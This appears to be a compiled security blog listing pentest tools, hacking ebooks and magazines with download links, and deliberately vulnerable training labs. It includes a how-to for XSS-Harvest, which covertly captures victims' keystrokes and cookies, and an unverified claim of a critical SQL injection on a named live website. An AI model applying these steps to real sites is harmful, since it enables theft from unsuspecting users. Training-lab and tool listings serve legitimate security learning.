Web Security Dojo is a free open-source self-contained training environment for Web Application Security penetration testing. Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v9.10. The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started - tools, targets, and documentation.

Info:
http://www.mavensecurity.com/web_security_dojo/

Look for Dojo videos on YouTube channel at http://www.youtube.com/user/MavenSecurity

Download:
http://sourceforge.net/projects/websecuritydojo/files/Version_1.2/

The Top 500 Worst Passwords of All Time

Check The Link..
http://www.whatsmypass.com/the-top-500-worst-passwords-of-all-time

The Samurai Web Testing Framework is a LiveCD

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

Download :

http://sourceforge.net/projects/samurai/

There has been a lot of discussion in recent weeks about some new variants of the Popureb rootkit that clobber your Master Boot Record (MBR).

Initial reports from Microsoft even suggested the only way to recover was to reinstall Windows, which fortunately is not true. But knowing how this rootkit work will surely increase your knowledge.

SophosLabs published a technical paper that looks at the inner workings of Popureb.

Download
http://www.sophos.com/medialibrary/PDFs/technical%20papers/popureb.pdf?dl=true

Durandal is a distributed GPU/CPU computing software that aims to crack passwords. Mostly written in C++ with the Boost library, it works on many systems, however it is only
built for Windows and GNU/Linux for the moment, on the x86 and x64 platforms.

Durandal is freely available under the GPLv3 license.

Features

Windows (XP, Vista, 7) and GNU/Linux support
32bits and 64bits support
Usual hash functions : MD5, SHA1, SHA256, SHA512, NTLMv1, MySQL (all versions)
SSE2 optimized, Nvidia CUDA support
Server, agent and administration console
Network communications with XML over HTTP (proxy support)

Download
http://durandal-project.org/download.html

Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Download
http://subgraph.com/vega_download.php

Modules

Cross Site Scripting (XSS)
SQL Injection
Directory Traversal
URL Injection
Error Detection
File Uploads
Sensitive Data Discovery

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with the web application planning and exploitation. Currently, it uses an efficient, fast and stable Web Crawler, File/Dir Bruteforcer and Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL Injections, Cross site scripting (XSS), brute-force for login forms, identification of firewall-filtered rules etc.

Download Setup
http://www.surgeonix.com/blog/downloads/websurgery/setup.msi
Download Portable
http://www.surgeonix.com/blog/downloads/websurgery/websurgery.zip

XSS-Harvest.
It is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool. Before going into the detail, I'll list the high level functionality below:

Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
Any key entered will be sent covertly to the server.
Any mouse click performed will be analysed and the data covertly sent to the server.
Optionally 'redress' the vulnerable page to display a different page on the same subdomain - e.g. a login form.
If redressing the victim's browser, allow subsequently loaded pages to be also 'infected' - assuming they don't break the same-origin policy (i.e. they're on the same subdomain).
Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
Each victim has a separate history file containing all events, cookies and keystrokes.
Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.

How to Exploit XSS with XSS-Harvest

Identify a page vulnerable to XSS (reflected or persistent will be fine - unless the victim is running IE9 or another plugin such as NoScript).
Understand the markup of the page. You should be looking to insert syntactically correct tags in to the source of the vulnerable page. Most attackers will insert something like 'alert(1)' at this stage to ensure the page is actually vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.
Insert the following 'injection string' into the vulnerable page:

This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in - a new history file will be created for each new victim.

If you wish to make use of the redress function, start the server with the -r parameter:

./xss-harvest.pl -l -r http://vulnerablepage.local/login.html

Download:
https://docs.google.com/leaf?id=0B-yhjV3y1-D2ZmVlMmUxMWUtNjJhYy00Njc5LWI0M2ItZTMwMmIxMTQ0NTNh&hl=en_GB

Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool for Website manager or IT Security analyst. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or users specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.


Test many types of databases
Your web applications using Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase?
Pangolin supports all of them.

Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.

Download
http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip

BackTrack 4 : Assuring Security by Penetration Testing

Written as an interactive tutorial, this book covers the core of BackTrack with real-world examples and step-by-step instructions to provide professional guidelines and recommendations to you. The book is designed in a simple and intuitive manner, which allows you to explore the whole BackTrack testing process or study parts of it individually. If you are an IT security professional or network administrator who has a basic knowledge of Unix/Linux operating systems including awareness of information security factors, and you want to use BackTrack for penetration testing, then this book is for you.




Download :
http://shrta.com/files/0ZYSOJBV/BackTrack-4-Assuring-Security-by-Penetration-Testing.zip

Anonymous Super Secret Security :P Handbook

Master Table of Contents
1) Preface
2) Setting up Tor
3) Firefox Recommended Add-Ons
4) Setting up i2p
4.1) Installation
4.2) Firefox Configuration
4.3) IRC Client Configuration
4.4) I2p IRC on Android via irssi connectbot
5) Advanced IRC
5.1) Commands
5.2) Browsing
6) Advanced Defense Techniques
7) Portable Solutions
8) ADVANCED GUIDE TO HACKING AND SECURITY VULNERABILITY

Download PDF:
http://adf.ly/313683/http://www.ziddu.com/download/15519429/Anonymous-Super-Secret-Security-Handbook.pdf.html

SQL Injection Attacks and Defense

Here is the table of contents…

Chapter 1: What is SQL Injection?
Chapter 2: Testing for SQL Injection
Chapter 3: Reviewing Code for SQL Injection
Chapter 4: Exploiting SQL Injection
Chapter 5: Blind SQL Injection Exploitation
Chapter 6: Exploiting the Operating System
Chapter 7: Advanced Topics
Chapter 8: Code-Level Defenses
Chapter 9: Platform-Level Defenses
Chapter 10: References

The Shellcoder’s Handbook

Part 1: Introduction to Exploitation: Linux on x86.

Chapter 1: Before You Begin.
Chapter 2: Stack Overflows.
Chapter 3: Shellcode.
Chapter 4: Introduction to Format String Bugs.
Chapter 5: Introduction to Heap Overflows.

Part 2: Exploiting More Platforms: Windows, Solaris, and Tru64.

Chapter 6: The Wild World of Windows.
Chapter 7: Windows Shellcode.
Chapter 8: Windows Overflows.
Chapter 9: Overcoming Filters.
Chapter 10: Introduction to Solaris Exploitation.
Chapter 11: Advanced Solaris Exploitation.
Chapter 12: HP Tru64 Unix Exploitation.

Part 3: Vulnerability Discovery.

Chapter 13: Establishing a Working Environment.
Chapter 14: Fault Injection.
Chapter 15: The Art of Fuzzing.
Chapter 16: Source Code Auditing: Finding Vulnerabilities in C-Based Languages.
Chapter 17: Instrumented Investigation: A Manual Approach.
Chapter 18: Tracing for Vulnerabilities.
Chapter 19: Binary Auditing: Hacking Closed Source Software.

Part 4: Advanced Materials.

Chapter 20: Alternative Payload Strategies.
Chapter 21: Writing Exploits that Work in the Wild.
Chapter 22: Attacking Database Software.
Chapter 23: Kernel Overflows.
Chapter 24: Exploiting Kernel Vulnerabilities.

Title: Malware Analyst’s Cookbook and DVD
Author: Michael Ligh, Steven Adair, Blake Hartstein, Matthew Richard
Publisher: Wiley
Hardcover: 744 pages
Release Date: November 2, 2010

Here is the ‘Table of Contents’

Chapter 1 – Anonymizing Your Activities.
Chapter 2 – Honeypots.
Chapter 3 – Malware Classification.
Chapter 4 – Sandboxes and Multi-AV Scanners.
Chapter 5 – Researching Domains and IP Addresses.
Chapter 6 – Documents, Shellcode, and URLs.
Chapter 7 – Malware Labs.
Chapter 8 – Automation.
Chapter 9 – Dynamic Analysis.
Chapter 10 – Malware Forensics.
Chapter 11 – Debugging Malware.
Chapter 12 – De-Obfuscation.
Chapter 13 – Working with DLLs.
Chapter 14 – Kernel Debugging.
Chapter 15 – Memory Forensics with Volatility.
Chapter 16 – Memory Forensics: Code Injection and Extraction.
Chapter 17 – Memory Forensics: Rootkits.
Chapter 18 – Memory Forensics: Network and Registry.

Social Engineering: The Art of Human Hacking

Title: Social Engineering: The Art of Human Hacking
Author: Christopher Hadnagy, Paul Wilson
Publisher: Wiley
Hardcover: 408 pages
Release Date: December 21, 2010

Table of Contents

A Look into the World of Social Engineering.
Information Gathering.
Elicitation.
Pretexting: How to Become Anyone.
Mind Tricks: Psychological Principles Used in Social Engineering.
Influence: The Power of Persuasion.
The Tools of the Social Engineer.
Case Studies: Dissecting the Social Engineer.
Prevention and Mitigation.

Title: Android in Action
Author: Frank Ableson, Robi Sen
Publisher: Manning Publications
Hardcover: 592 pages
Release Date: Jan 28, 2011 (2nd Edition)

Here’s the table of Contents

Part 1 What is Android?—The Big Picture

Chapter 1 Introducing Android
Chapter 2 Android’s development environment
Part 2 Exercising the Android SDK

Chapter 3 User interfaces
Chapter 4 Intents and Services
Chapter 5 Storing and retrieving data
Chapter 6 Networking and web services
Chapter 7 Telephony
Chapter 8 Notifications and alarms
Chapter 9 Graphics and animation
Chapter 10 Multimedia
Chapter 11 Location, location, location
Part 3 Android applications

Chapter 12 Putting Android to work in a field service application
Chapter 13 Building Android applications in C
Part 4 The maturing platform

Chapter 14 Bluetooth and sensors
Chapter 15 Integration
Chapter 16 Android web development
Chapter 17 AppWidgets
Chapter 18 Localization
Chapter 19 Android Native Development Kit

Practical Lock Picking

Title: Practical Lock Picking: A Physical Penetration Tester’s Training Guide
Author: Deviant Ollam
Publisher: Syngress
Hardcover: 236 pages
Release Date: July 23, 2010

Here is the table of contents

Chapter 1: Fundamentals of pin tumbler and wafer locks
Chapter 2: The basics of picking: Exploiting weaknesses
Chapter 3: Beginner training: How to get very good, very fast
Chapter 4: Advanced training: Learning some additional skills
Chapter 5: Quick-entry tricks: Shimming, bumping, and bypassing
Chapter 6: They all come tumbling down: Pin tumblers in other configurations
Appendix: Guide to tools and toolkits

The Hacker News June 2011

Content :
- Total Exposure
- Wikileaks : Exposure in true way
- Guide about selecting your Computer Security Consultant
- In the Realm of Cyber Breach
- Exploit Writers : Challenging Cyber Security
- Interview with Team Inj3ct0r
- IT Security Incident Management
- Interview with Core Anonymous Member : Anony_ops
- Exposure of Password secrets of Apple Safari
- Sony Hacked , Again hacked & Again Hacked
- Hacking News Highlights of the Month
- Hackers Toolkits Updates
- Security Tool : Buffer Zone

Download:
http://theevilhackerz.com/THN-june2011.pdf

The Hacker News June 2011

Content :
- Total Exposure
- Wikileaks : Exposure in true way
- Guide about selecting your Computer Security Consultant
- In the Realm of Cyber Breach
- Exploit Writers : Challenging Cyber Security
- Interview with Team Inj3ct0r
- IT Security Incident Management
- Interview with Core Anonymous Member : Anony_ops
- Exposure of Password secrets of Apple Safari
- Sony Hacked , Again hacked & Again Hacked
- Hacking News Highlights of the Month
- Hackers Toolkits Updates
- Security Tool : Buffer Zone

Download:
http://theevilhackerz.com/THN-june2011.pdf

ClubHACK Magazine Issue 17-June 2011

Tech Gyan - Pentesting your own Wireless Network
Tool Gyan - Wi-Fi tools
Mom's Guide - Wireless Security - Best Practices
Legal Gyan - Copyrights and cyber space
Matriux Vibhag - Forensics with Matriux Part - 2
Poster of the month - Can you cage a Wi-Fi signanl ?

Download:
http://chmag.in/issue/jun2011.pdf

ClubHack Magazine

Contents of this Issue:-

Tech Gyan - First ever public disclosure of Password secrets of "Apple Safari".
Tool Gyan - BeEF (Browser Exploitation Framework)
Mom's Guide - User Agent on my Header.
Legal Gyan - New Rules under Information Technology Act.
Matriux Vibhag - Forensics with Matriux Part - 1
Poster of the month - How safe you are while surfing?


Direct Download: http://chmag.in/issue/may2011.pdf

The Web Application Hacker's Handbook 2nd: Discovering and Exploiting Security Flaws

Web Application (In)security
Core Defense Mechanisms
Web Application Technologies
Mapping the Application
Bypassing Client-Side Controls
Attacking Authentication
Attacking Session Management
Attacking Access Controls
Injecting Code
Exploiting Path Traversal
Attacking Application Logic
Attacking Other Users
Automating Bespoke Attacks
Exploiting Information Disclosure
Attacking Compiled Applications
Attacking Application Architecture
Attacking the Web Server
Finding Vulnerabilities in Source Code
A Web Application Hacker's Toolkit
A Web Application Hacker's Methodology

Download the full table of contents (PDF).
http://portswigger.net/wahh/wahh-toc.pdf

ClubHack Magazine. issue is dedicated to Browser security.

Direct Download:
http://chmag.in/issue/may2011.pdf

Tech Gyan - First ever public disclosure of Password secrets of "Apple
Safari".
Tool Gyan - BeEF (Browser Exploitation Framework)
Mom's Guide - User Agent on my Header.
Legal Gyan - New Rules under Information Technology Act.
Matriux Vibhag - Forensics with Matriux Part - 1

The Hacker News' Magazine - Social Engineering Edition - Issue 02 - May,2011 Released !


We are happy to Announce that 'The Hacker News' [THN] Magazine Issue 02 (May 2011) is Out . This time we cover "Social Engineering Edition" . The Index of Content is as Given Below :

Social Engineering
Opsony By Anonymous
Anna Hazare - The Revolution in India
Message By Pattie Galle
Hacking News of Month
Hackers Toolkit updates & Downloads
Defacement News
Security and Hacking Events of Month
Cyber Crime News
Linux News
Security Updates
Vulnerability Exposure

Download:
http://theevilhackerz.com/may-2011.pdf

The Hacker’s Underground Handbook
Ebook

The Hacker’s Underground Handbook
Learn What it Takes to Crack Even the Most Secure Systems
By: David Melnichuk

The Hacker’s Underground Handbook will guide you through password hacking, windows hacking, malware, phising, web hacking, network hacking and Linux (intro, installation, etc). All this material fully packed with images, thus being a top step-by-step guide, on the course of which you cannot fail.

A great starting book which will guide you in the right direction, helping you understand the basic concepts of computer security and matters that you should take in consideration.

Download PDF
http://3xploit.com/file/The_Hackers_Underground_Handbook.pdf

XSS Attacks
Ebook

PUBLISHED BY- Syngress Publishing, Inc. ISBN-10: 1-59749-154-3
ISBN-13: 978-1-59749-154-9
This book is all about XSS. It will cover these topics on XSS.

Cross-site Scripting Fundamentals.
The XSS Discovery Toolkit
XSS Theory
XSS Attack Methods
Advanced XSS Attack Vectors
XSS Exploited
Exploit Frameworks
XSS Worms
Preventing XSS Attacks

Download PDF
http://3xploit.com/file/Cross_Site_Scripting_Attacks_XSS_Exploits_and_Defense_tqw_darksiderg.rar

Title: The Art of Computer Virus Research and Defense
Author: Peter Szor
Publisher: Addison-Wesley Professional
Hardcover: 744 pages



Part: I Strategies of the Attacker

Chapter 1. Introduction to the Games of Nature
Chapter 2. The Fascination of Malicious Code Analysis
Chapter 3. Malicious Code Environments
Chapter 4. Classification of Infection Strategies
Chapter 5. Classification of In-Memory Strategies
Chapter 6. Basic Self-Protection Strategies
Chapter 7. Advanced Code Evolution Techniques and Computer Virus Generator Kits
Chapter 8. Classification According to Payload
Chapter 9. Strategies of Computer Worms
Chapter 10. Exploits, Vulnerabilities, and Buffer Overflow Attacks

Part: II Strategies of the Defender

Chapter 11. Antivirus Defense Techniques
Chapter 12. Memory Scanning and Disinfection
Chapter 13. Worm-Blocking Techniques and Host-Based Intrusion Prevention
Chapter 14. Network-Level Defense Strategies
Chapter 15. Malicious Code Analysis Techniques

Title: Kingpin – How One Hacker Took Over the Billion-Dollar Cybercrime Underground
Author: Kevin Poulsen
Publisher: Crown
Hardcover: 288 pages
Release Date: February 22, 2011

In KINGPIN, Kevin tells the story of Max Vision, a white hat computer hacker who turned to the dark side. Among other things, Max stole credit card data — “dumps” — on millions of consumers, which he sold in bulk to a card counterfeiter named Chris Aragon. In this excerpt, a new discovery gives him a chance to expand his operation.
Book exposes scary story of how online hackers stocked credit card numbers, fake checks, hacked bank accounts to make millions overnight through well structured ring of criminals operating from dark corners of world. It showcases how attackers used advanced techniques such as remote execution exploits, smart phishing sites, Trojans, advanced keyloggers to sweep the innocent victims around the world and transferred bounties under the nose of security guards from top banks. A good case study for Howard folks to ponder into.

This site uses a number of databases that have been released to the public. No passwords are stored in the ShouldIChangeMyPassword.com database.

https://shouldichangemypassword.com/

Source
https://shouldichangemypassword.com/sources.php

Name: BadStore
Homepage: http://www.badstore.net/
Brief description: Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure. Our Badstore demonstration software is designed to show you common hacking techniques.
Version/Levels: 1 (v1.2)


Name: BodgeIT
Homepage: https://code.google.com/p/bodgeit/
Brief description: The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
Version/Levels: 1 (v1.1.0)


Name: Damn Vulnerable Web App
Homepage: http://www.dvwa.co.uk/
Brief description: Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
Version/Levels: 1 (v1.0.7)



Name: Hacking-Lab
Homepage: http://www.hacking-lab.com/
Brief description: This ist the LiveCD project of Hacking-Lab (www.hacking-lab.com). It gives you OpenVPN access into Hacking-Labs Remote Security Lab. The LiveCD iso image runs very good natively on a host OS, or within a virtual environment (VMware, VirtualBox).
The LiveCD gives you OpenVPN access into Hacking-Lab Remote.You will gain VPN access if both of the two pre-requirements are fulfilled.
Version/Levels: 1 (v5.30)


Name: HackUS HackFest Web CTF
Homepage: http://hackus.org/en/media/training/
Brief description: The Hackfest is an annual event held in Quebec city. For each event, a competition is held where participants competed at solving challenges related to security. For the 2010 edition, I got involved in the competition by creating the web portion of the competition.
Version/Levels: 1 (2010)



Name: Hacme
Homepage: http://www.mcafee.com/us/downloads/free-tools/index.aspx
Brief description: Foundstone Hacme Casino™ is a learning platform for secure software development and is targeted at software developers, application penetration testers, software architects, and anyone with an interest in application security.
Version/Levels: 5 (2006)



Name: Hackxor
Homepage: http://hackxor.sourceforge.net/cgi-bin/index.pl
Brief description: Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc
Version/Levels: 1



Name: LAMPSecurity
Homepage: http://sourceforge.net/projects/lampsecurity/
Brief description: Foundstone Hacme Casino™ is a learning platform for secure software development and is targeted at software developers, application penetration testers, software architects, and anyone with an interest in application security.
Version/Levels: v6 (4x)



Name: Moth
Homepage: http://www.bonsai-sec.com/en/research/moth.php
Brief description: Moth is a VMware image with a set of vulnerable Web Applications and scripts.
Version/Levels: v6



Name: Mutillidae
Homepage: http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Brief description: Mutillidae: A Deliberately Vulnerable Set Of PHP Scripts That Implement The OWASP Top 10
Version/Levels: v1.5



Name: Open Web Application Security Project (OWASP) Broken Web Applications Project
Homepage: https://code.google.com/p/owaspbwa/ or https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
Brief description: This project includes applications from various sources (listed in no particular order).



Name: SecuriBench
Homepage: http://suif.stanford.edu/~livshits/securibench/
Brief description: Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java
Version/Levels: v0.91a



Name: UltimateLAMP
Homepage: http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/
Brief description: UltimateLAMP is a fully functional environment allowing you to easily try and evaluate a number of LAMP stack software products without requiring any specific setup or configuration of these products. UltimateLAMP runs as a Virtual Machine with VMware Player (FREE). This demonstration package also enables the recording of all user entered information for later reference, indeed you will find a wealth of information already available within a number of the Product Recommendations starting with the supplied Documentation.
Version/Levels: v0.2



Name: Vicnum
Homepage: http://vicnum.ciphertechs.com/
Brief description: A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats
Version/Levels: 1.4 (2009)


Name: Virtual Hacking Lab
Homepage: http://virtualhacking.sourceforge.net/
Brief description: A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats
Version/Levels: 1



Name: WackoPicko
Homepage: https://github.com/adamdoupe/WackoPicko
Brief description: WackoPicko is a vulnerable web application used to test web application vulnerability scanners.
Version/Levels: 1


Name: WebGoat
Homepage: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
Brief description: WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application.
Version/Levels: 1



Name: WebMaven
Homepage: http://www.mavensecurity.com/WebMaven/
Brief description: WebMaven (better known as Buggy Bank) was an interactive learning environment for web application security. It emulated various security flaws for the user to find. This enabled users to safely & legally practice web application vulnerability assessment techniques. In addition, users could benchmark their security audit tools to ensure they perform as advertised.
Version/Levels: 1.0.1


Name: Web Security Dojo
Homepage: http://www.mavensecurity.com/web_security_dojo/
Brief description: A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v10.04.1, which is patched with the appropriate updates and VM additions for easy use.
Version 1.1 includes an exclusive speed-enhanced version of Burp Suite Free. Special thanks to PortSwigger .
Version/Levels: 1

Name: Digital Forensics Tool Testing Images
Homepage: http://dftt.sourceforge.net/
Brief description: To fill the gap between extensive tests from NIST and no public tests, I have been developing small test cases. The following are file system and disk images for testing digital (computer) forensic analysis and acquisition tools.
Version/Levels: 14


Name: Digital Corpora - DiskImages & Scenarios
Homepage: http://digitalcorpora.org/corpora/disk-images & http://digitalcorpora.org/corpora/scenarios
Brief description: We have many sources of disk images available for use in education and research. The easiest disk images to work with are the NPS Test Disk Images.


Scenarios are collections of multiple disk images, memory dumps, network traffic, and/or data from portable devices.
Version/Levels: 3 + 7


Name: DFRWS 2011 Forensics Challenge
Homepage: http://www.dfrws.org/2011/challenge/
Brief description: Given the variety and impending ubiquity of Android devices along with the wide range of crimes that can involve these systems as a source of evidence, the DFRWS has created two scenarios for the forensics challenge in 2011.
Version/Levels: 2


Name: ForensicKB
Homepage: http://www.forensickb.com/search/label/Forensic%20Practical
Brief description: We have many sources of disk images available for use in education and research. The easiest disk images to work with are the NPS Test Disk Images.
Version/Levels: Level 1, Level 2, Level 3, Level 4



Name: Honeynet Project Challenges
Homepage: https://www.honeynet.org/challenges
Brief description: The purpose of Honeynet Challenges is to take this learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Challenges give the security community the opportunity to analyze these attacks and share their findings. The end results is not only do individuals and organizations learn about threats, but how to learn and analyze them. Even better, individuals can see the write-ups from other individuals, learning new tools and technique for analyzing attacks. Best of all, these attacks are from the wild, real hacks.
Version/Levels: 8

Name: OverTheWire
Homepage: http://www.overthewire.org/wargames/
Brief description: The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of funfilled games.
Levels: 7



Name: pwn0
Homepage: https://pwn0.com/home.php
Brief description: Just sign up, connect to the VPN, and start hacking.
Levels:1

Name: Biscuit
Homepage: http://heideri.ch/biscuit/
Brief description: Goal: alert(document.cookie) // extract the PHPSESSID, FF3.6 - 4 only!
Version/Levels: 1


Name: Gruyere / Jarlsberg
Homepage: http://google-gruyere.appspot.com/
Brief description: This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application
Version/Levels: 1 (v1.0.7)



Name: HackThis
Homepage: http://www.hackthis.co.uk/
Brief description: Welcome to HackThis!!, this site was set up over 2 years ago as a safe place for internet users to learn the art of hacking in a controlled environment, teaching the most common flaws in internet security.
Version/Levels: 32 (40?)



Name: HackThisSite
Homepage: http://www.hackthissite.org/
Brief description: Hack This Site is a free, safe and legal training ground for hackers to test and expand their hacking skills. More than just another hacker wargames site, we are a living, breathing community with many active projects in development, with a vast selection of hacking articles and a huge forum where users can discuss hacking, network security, and just about everything. Tune in to the hacker underground and get involved with the project.
Version/Levels: Lots


Name: Hell Bound Hackers
Homepage: http://www.hellboundhackers.org/
Brief description: We offer challenges that teach you how computer based exploits work. The idea being, if you know how to exploit a website for instance, then you can go and secure your website, and help others in securing theirs. If you know how malicious hackers get in, you can keep them out.
Version/Levels: Lots


Name: Hackxor
Homepage: http://hackxor.sourceforge.net/cgi-bin/index.pl
Brief description: Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc
Version/Levels: 1


Name: Vicnum
Homepage: http://vicnum.ciphertechs.com/
Brief description: A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or standalone formats
Version/Levels: 1.4 (2009)

Name: Damn Vulnerable Linux
Homepage: http://www.damnvulnerablelinux.org/
Brief description: Damn Vulnerable Linux (DVL) is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
Version/Levels: 1


Name: De-ICE
Homepage: http://heorot.net/livecds/ or http://www.de-ice.net
Brief description: The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.
Version/Levels: Level 1 - Disk 1, Level 1 - Disk 2, Level 1 - Disk 3 (A & B) Level 2 - Disk 1



Name: Holynix
Homepage: http://pynstrom.net/holynix.php
Brief description: Holynix is a Linux distribution that was deliberately built to have security holes for the purposes of penetration testing.
Version/Levels: 2


Name: Kioptrix
Homepage: http://www.kioptrix.com
Brief description: This Kioptrix VM Image are easy challenges. The object of the game is to acquire
root access via any means possible (except actually hacking the VM server or player).
The purpose of these games are to learn the basic tools and techniques in vulnerability
assessment and exploitation. There are more ways then one to successfully complete the challenges.
Version/Levels: 3


Name: Metasploitable
Homepage: http://blog.metasploit.com/2010/05/introducing-metasploitable.html
Brief description: One of the questions that we often hear is "What systems can i use to test against?" Based on this, we thought it would be a good idea throw together an exploitable VM that you can use for testing purposes.
Version/Levels: 1



Name: NETinVM
Homepage: http://informatica.uv.es/~carlos/docencia/netinvm/#id7
Brief description: NETinVM is a single VMware virtual machine image that contains, ready to run, a series of User-mode Linux (UML) virtual machines which, when started, conform a whole computer network inside the VMware virtual machine. Hence the name NETinVM, an acronym for NETwork in Virtual Machine. NETinVM has been conceived mainly as an educational tool for teaching and learning about operating systems, computer networks and system and network security, but other uses are certainly possible.
Version/Levels: 3 (2010-12-01)



Name: pWnOS
Homepage: http://forums.heorot.net/viewtopic.php?f=21&t=149
Brief description: It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :) Currently, the virtual machine NIC is configured in bridged networking, so it will obtain a normal IP address on the network you are connected to. You can easily change this to NAT or Host Only if you desire. A quick ping sweep will show the IP address of the virtual machine.
Version/Levels: 1



Name: RuCTFE 2010
Homepage: http://ructf.org/e/2010/
Brief description: RuCTFE is a remote challenge in information security
Version/Levels: 1

General Information

Website: www.dukascopy.com
Vulnerability Type: SQL Injection Vulnerability
Alert Level: Critical
Threats: Entire Database Access, Shell Uploading

by Mr.
zsecure

Fern Wifi Cracker 1.5 is available, download fern 1.2 then update to 1.5 by using the update download button

This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools.

It should work on any version of linux running the following:

Requirements:

python
python-qt4
macchanger
aircrack-ng
xterm
subversion

To install simply run the following command in terminal after changing directory to the path were the downloaded package is:

root@host:~# dpkg -i Fern-Wifi-Cracker_1.2_all.deb

Download
http://code.google.com/p/fern-wifi-cracker/downloads/list

OWASP Zed Attack Proxy v.1.3.1 Released
The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.

Download:
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Changelog:
https://code.google.com/p/zaproxy/downloads/list

http://www.youtube.com/watch?v=xJYhPrbtqug&feature=player_embedded

ironic
http://www.youtube.com/watch?v=quSL92cIueI

“SniffJoke (Sj) implements a set of anti sniffing technology itself, but begins developed as a modular framework.
Will easily be supported by a security community that want to exploit and explore sniffing faults. SniffJoke is an application for Linux that handle transparently your TCP connection, delaying, modifying and injecting fake packets inside your transmission, make them almost impossible to be correctly read by a passive wiretapping technology (IDS or sniffer). An internet client running SniffJoke injects in the transmission flow some packets able to seriously disturb passive analysis like sniffing, interception and low level information theft. No server supports needed!“

Download Sniffjoke v0.4.2 (sniffjoke-0.4.2.tar.bz2)
https://github.com/vecna/sniffjoke/downloads

Software:
